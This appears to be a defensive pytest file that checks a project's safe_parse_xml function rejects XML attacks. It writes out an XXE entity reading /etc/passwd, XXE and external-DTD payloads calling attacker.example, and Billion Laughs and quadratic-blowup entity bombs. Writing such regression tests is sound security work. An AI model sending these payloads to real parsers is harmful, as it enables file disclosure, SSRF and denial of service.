Spaces:
Sleeping
Sleeping
Claude
fix(sprint-S1.4): forbid_dtd=True + tests d'attaque XXE/Billion Laughs/DTD
2905909 unverified | """Sprint S1.4 — Tests d'attaque XXE / Billion Laughs / DTD retrieval. | |
| Vérifie que ``picarones.formats._xml_utils.safe_parse_xml`` | |
| **rejette** les payloads malicieux que l'audit prétendait | |
| défendre via ``defusedxml``. | |
| Sans ces tests, la défense est invisible : un refactor pourrait | |
| bypasser ``defusedxml`` sans qu'aucun test n'échoue. | |
| Vecteurs couverts | |
| ----------------- | |
| 1. **XXE** (XML External Entity) — résolution d'entité vers un | |
| fichier local ``/etc/passwd`` ou une URL distante. | |
| 2. **Billion Laughs** — expansion exponentielle d'entités | |
| (``lol1`` → ``lol2`` × 10 → ``lol3`` × 100 → ...). | |
| 3. **DTD retrieval** — fetch d'une DTD distante (SSRF côté parser). | |
| 4. **Quadratic blowup** — grosse entité répétée linéairement. | |
| """ | |
| from __future__ import annotations | |
| from picarones.formats._xml_utils import safe_parse_xml | |
| # ────────────────────────────────────────────────────────────────────── | |
| # 1. XXE — fichier local | |
| # ────────────────────────────────────────────────────────────────────── | |
class TestXXEFileExfiltration:
    """XXE payloads that declare an external entity must be rejected.

    Each test hands ``safe_parse_xml`` a document whose DOCTYPE declares a
    ``SYSTEM`` entity and expects ``None`` back.  Were such a payload
    accepted, the referenced resource could end up inlined in the parsed
    tree.
    """

    def test_xxe_file_uri_is_blocked(self) -> None:
        """An entity pointing at ``file:///etc/passwd`` is refused."""
        payload = (
            b'<?xml version="1.0"?>'
            b'<!DOCTYPE foo ['
            b' <!ENTITY xxe SYSTEM "file:///etc/passwd">'
            b']>'
            b'<root>&xxe;</root>'
        )
        result = safe_parse_xml(payload)
        # Per the original author's note, safe_parse_xml returns None when
        # an attack is detected (defusedxml.EntitiesForbidden /
        # DTDForbidden).
        assert result is None, (
            "XXE non bloqué : safe_parse_xml a accepté un payload "
            "avec ``<!ENTITY xxe SYSTEM \"file:///...\">`` ; un "
            "attaquant pourrait exfiltrer ``/etc/passwd`` ou tout "
            "autre fichier lisible par le process."
        )

    def test_xxe_http_uri_is_blocked(self) -> None:
        """An entity pointing at an HTTP URL is refused.

        Variant of the file-URI case: resolving the entity would make the
        parser issue a request to an attacker-controlled server (SSRF).
        """
        payload = (
            b'<?xml version="1.0"?>'
            b'<!DOCTYPE foo ['
            b' <!ENTITY xxe SYSTEM "http://attacker.example/leak">'
            b']>'
            b'<root>&xxe;</root>'
        )
        result = safe_parse_xml(payload)
        assert result is None, (
            "XXE non bloqué : safe_parse_xml a accepté un payload "
            "avec ``<!ENTITY xxe SYSTEM \"http://...\">`` (SSRF "
            "côté parser)."
        )
| # ────────────────────────────────────────────────────────────────────── | |
| # 2. Billion Laughs — DoS par expansion d'entités | |
| # ────────────────────────────────────────────────────────────────────── | |
class TestBillionLaughs:
    """Entity-expansion denial-of-service payloads must be rejected.

    The classic "Billion Laughs" document nests entity definitions so that
    each level expands to ten copies of the previous one.  The payloads
    here are deliberately small: the tests only check that
    ``safe_parse_xml`` refuses them, so a regression shows up as a failed
    assertion rather than as memory exhaustion.
    """

    def test_billion_laughs_is_blocked(self) -> None:
        """A five-level nested entity chain (10^4 copies of "lol") is refused."""
        payload = (
            b'<?xml version="1.0"?>'
            b'<!DOCTYPE lolz ['
            b' <!ENTITY lol "lol">'
            b' <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
            b' <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">'
            b' <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">'
            b' <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">'
            b']>'
            b'<lolz>&lol5;</lolz>'
        )
        result = safe_parse_xml(payload)
        assert result is None, (
            "Billion Laughs non bloqué : le parser a accepté une "
            "expansion exponentielle d'entités (DoS / OOM)."
        )

    def test_quadratic_blowup_is_blocked(self) -> None:
        """A single large entity referenced many times is refused.

        The module docstring lists quadratic blowup as a covered vector;
        this test makes that coverage real.  Unlike Billion Laughs there is
        no nesting: one entity is simply repeated linearly in the body.
        """
        # 1000-byte entity x 100 references = ~100 kB if expanded: harmless
        # even if the defence regresses and the document gets parsed.
        big_value = b'a' * 1000
        payload = b''.join([
            b'<?xml version="1.0"?>',
            b'<!DOCTYPE bomb [',
            b' <!ENTITY a "', big_value, b'">',
            b']>',
            b'<bomb>', b'&a;' * 100, b'</bomb>',
        ])
        result = safe_parse_xml(payload)
        assert result is None, (
            "Quadratic blowup non bloqué : le parser a accepté une "
            "grosse entité répétée linéairement (DoS / OOM)."
        )
| # ────────────────────────────────────────────────────────────────────── | |
| # 3. DTD retrieval — DOCTYPE externe | |
| # ────────────────────────────────────────────────────────────────────── | |
class TestDTDRetrieval:
    """Documents referencing an external DTD must be rejected.

    Fetching an external DTD means an HTTP/HTTPS request issued by the
    parser itself, i.e. an SSRF vector plus an information leak.
    """

    def test_external_dtd_is_blocked(self) -> None:
        """A ``<!DOCTYPE ... SYSTEM "http://...">`` declaration is refused."""
        payload = (
            b'<?xml version="1.0"?>'
            b'<!DOCTYPE root SYSTEM "http://attacker.example/evil.dtd">'
            b'<root>data</root>'
        )
        result = safe_parse_xml(payload)
        assert result is None, (
            "DTD retrieval non bloqué : ``<!DOCTYPE root SYSTEM "
            "\"http://...\">`` peut déclencher une requête HTTP "
            "depuis le serveur Picarones (SSRF)."
        )
| # ────────────────────────────────────────────────────────────────────── | |
| # 4. Sanity — XML légitime doit passer | |
| # ────────────────────────────────────────────────────────────────────── | |
class TestLegitimateXMLPasses:
    """Guard rail: the hardening must not reject benign documents.

    An ALTO or PAGE XML file that declares no entities has to keep
    parsing, otherwise the defence turns into a false positive.
    """

    def test_simple_alto_xml_parses(self) -> None:
        """A minimal namespaced ALTO document is parsed and its root returned."""
        payload = (
            b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<alto xmlns="http://www.loc.gov/standards/alto/ns-v4#">'
            b' <Layout>'
            b' <Page WIDTH="1000" HEIGHT="1500"/>'
            b' </Layout>'
            b'</alto>'
        )
        result = safe_parse_xml(payload)
        assert result is not None, (
            "ALTO XML légitime refusé — fausse alerte."
        )
        # The tag is compared by suffix, which tolerates a namespace prefix
        # on the root tag.
        assert result.tag.endswith("alto")

    def test_xml_with_entities_internes_parses(self) -> None:
        """Predefined XML entities stay accepted.

        ``&amp;``, ``&lt;``, ``&gt;``, ``&quot;`` and ``&apos;`` are built
        into XML and need no DTD, so they must still be resolved by the
        parser.
        """
        # The text content must use entity references: a raw ``&`` or ``<``
        # would make the document malformed and the test would no longer
        # exercise entity resolution at all.
        payload = (
            b'<?xml version="1.0"?>'
            b'<root>R&amp;D &lt;tag&gt;</root>'
        )
        result = safe_parse_xml(payload)
        assert result is not None
        assert result.text == "R&D <tag>"
| # ────────────────────────────────────────────────────────────────────── | |
| # 5. XML invalide retourne None (pas d'exception qui remonte) | |
| # ────────────────────────────────────────────────────────────────────── | |
class TestInvalidXMLReturnsNone:
    """Malformed input is expected to yield ``None``, not a raised exception."""

    def test_truncated_xml_returns_none(self) -> None:
        """An unclosed root element is reported as ``None``."""
        assert safe_parse_xml(b'<root>') is None

    def test_empty_bytes_returns_none(self) -> None:
        """An empty byte string is reported as ``None``."""
        assert safe_parse_xml(b'') is None

    def test_non_xml_bytes_returns_none(self) -> None:
        """Plain text with no markup is reported as ``None``."""
        assert safe_parse_xml(b'not xml at all just text') is None